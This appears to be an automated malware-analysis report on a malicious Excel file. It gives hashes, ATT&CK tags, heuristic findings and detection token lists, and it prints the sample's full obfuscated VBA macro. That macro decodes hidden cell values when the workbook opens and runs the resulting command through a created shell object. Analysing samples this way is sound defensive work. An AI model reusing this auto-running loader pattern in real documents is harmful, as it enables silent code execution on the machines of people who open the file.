Office (OLE) / .XLS malware analysis — malicious · 7c072e0cece37868

MALICIOUS

Office (OLE) / .XLS

39.5 KB Created: 2023-07-04 22:31:07 Authoring application: Microsoft Excel First seen: 2023-07-08

MD5: 30815b255690ba7038ee66e5fd9515fa SHA-1: 59ce2dc4964fcc4950642bc970afe1c191bdc9c9 SHA-256: 7c072e0cece37868b70728a2129a37905e2cbf4a4e09d0eb52b024743d6dfafa

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro. The heuristics indicate the use of CreateObject and GetObject, suggesting the macro attempts to instantiate and run objects. The VBA code, though obfuscated, contains a subroutine named 'PhiliP' which takes an object and a string argument, and calls the 'Run' method on the object with the string. This strongly suggests the macro is designed to download and execute a second-stage payload. The lack of specific IOCs beyond the macro name and the obfuscated nature of the script prevent a higher confidence score or family attribution.

Heuristics 5

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

                                                                        Set Suffering = GetObject(Crossing).CreateObject(Methodology)

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

                                                                        Set Suffering = GetObject(Crossing).CreateObject(Methodology)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
              Sub Workbook_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4253 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4253 bytes
SHA-256: `38efc687d8b28ed06d8f3143993d5d81afd4d7866e58b267d75767edff621d98`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Private Suffering As Object Private Sub Discipline(ByVal Crossing As String, ByVal Chains As String, ByVal Methodology As String, ByVal Vitamin As String) GanGbanG Crossing, Methodology PhiliP Suffering, Vitamin, Chains End Sub Sub PhiliP(ByVal Suffering As Object, ByVal Vitamin As String, ByVal Chains As String) Suffering.Run Chains, 0 End Sub Private Function Cooperative(ByVal Mozilla As String) As Variant Dim Sigma As Long: Sigma = 0: Dim Algorithms() As Byte Dim Fonts() As Byte, Brush As String, Parenting As Integer, Trunk As Integer, EntitiEs As Integer Fonts = "k1a39af4d6" GoTo Invest Hospitality: If Sigma < UBound(Algorithms) Then Parenting = Sigma Mod (10) EntitiEs = Fonts(Parenting * 2) Trunk = Algorithms(Sigma) GoTo Induced Workforce: Brush = Brush & Chr(Algorithms(Sigma)) Sigma = Sigma + 1 GoTo Hospitality Else GoTo Mobility End If Mobility: Cooperative = Brush Exit Function Invest: Algorithms = ActivAtion(Mozilla) GoTo Hospitality Induced: Algorithms(Sigma) = Abs(Trunk Xor EntitiEs) GoTo Workforce End Function Sub GanGbanG(ByVal Crossing As String, ByVal Methodology As String) Set Suffering = GetObject(Crossing).CreateObject(Methodology) End Sub Sub Workbook_Open() Discipline Cooperative(Sheets("gc28").Range("G114").Value), Cooperative(Sheets("gc28").Range("E148").Value), Cooperative(Sheets("gc28").Range("E161").Value), Cooperative(Sheets("gc28").Range("F196").Value) End Sub Private Function ActivAtion(ByVal Spectacular As String) As Variant Dim Brush() As Byte, i As Long, Parenting As Integer, Anymore As Integer Anymore = Len(Spectacular) / 2: i = 0: ReDim Brush(0 To Anymore) As Byte EntitiEs: If i < Len(Spectacular) Then Parenting = Parenting + 1 Brush(Parenting - 1) = Chr((20 - 6) + (((8 - 2) * 2) * 2)) & Chr((((32 / 4) * 2) + (4 * 5)) * 2) & Mid(Spectacular, i + 1, 2) i = i + 2 GoTo EntitiEs Else GoTo Shelf Dim Induced As String Induced = InputBox("celp lape") End If Shelf: ActivAtion = Brush End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 38efc687d8b28ed06d8f3143993d5d81afd4d7866e58b267d75767edff621d98

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Suffering As Object







                                                    Private Sub Discipline(ByVal Crossing As String, ByVal Chains As String, ByVal Methodology As String, ByVal Vitamin As String)
GanGbanG Crossing, Methodology
PhiliP Suffering, Vitamin, Chains
End Sub
Sub PhiliP(ByVal Suffering As Object, ByVal Vitamin As String, ByVal Chains As String)
Suffering.Run Chains, 0
End Sub
Private Function Cooperative(ByVal Mozilla As String) As Variant





               Dim Sigma As Long: Sigma = 0: Dim Algorithms() As Byte
Dim Fonts() As Byte, Brush As String, Parenting As Integer, Trunk As Integer, EntitiEs As Integer





           Fonts = "k1a39af4d6"
GoTo Invest
Hospitality:
If Sigma < UBound(Algorithms) Then
Parenting = Sigma Mod (10)
EntitiEs = Fonts(Parenting * 2)
Trunk = Algorithms(Sigma)





              GoTo Induced
Workforce:








             





                                                                        Brush = Brush & Chr(Algorithms(Sigma))








                                            Sigma = Sigma + 1





               GoTo Hospitality







                                            Else
GoTo Mobility
End If
Mobility:







                                        Cooperative = Brush





           Exit Function
Invest:






                                                                





                                                                    Algorithms = ActivAtion(Mozilla)





                 GoTo Hospitality







              





Induced:








           Algorithms(Sigma) = Abs(Trunk Xor EntitiEs)





             






                  GoTo Workforce





           End Function
Sub GanGbanG(ByVal Crossing As String, ByVal Methodology As String)






                                                                        Set Suffering = GetObject(Crossing).CreateObject(Methodology)
End Sub








              Sub Workbook_Open()






                                                        Discipline Cooperative(Sheets("gc28").Range("G114").Value), Cooperative(Sheets("gc28").Range("E148").Value), Cooperative(Sheets("gc28").Range("E161").Value), Cooperative(Sheets("gc28").Range("F196").Value)
End Sub





                                                                        Private Function ActivAtion(ByVal Spectacular As String) As Variant







                                                                




                 






                







            Dim Brush() As Byte, i As Long, Parenting As Integer, Anymore As Integer





              




                Anymore = Len(Spectacular) / 2: i = 0: ReDim Brush(0 To Anymore) As Byte





                                                        





                




                                                    






EntitiEs:
If i < Len(Spectacular) Then








             Parenting = Parenting + 1
Brush(Parenting - 1) = Chr((20 - 6) + (((8 - 2) * 2) * 2)) & Chr((((32 / 4) * 2) + (4 * 5)) * 2) & Mid(Spectacular, i + 1, 2)






          i = i + 2
GoTo EntitiEs
Else
GoTo Shelf







             Dim Induced As String
Induced = InputBox("celp lape")





                End If





Shelf:








                                            ActivAtion = Brush
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.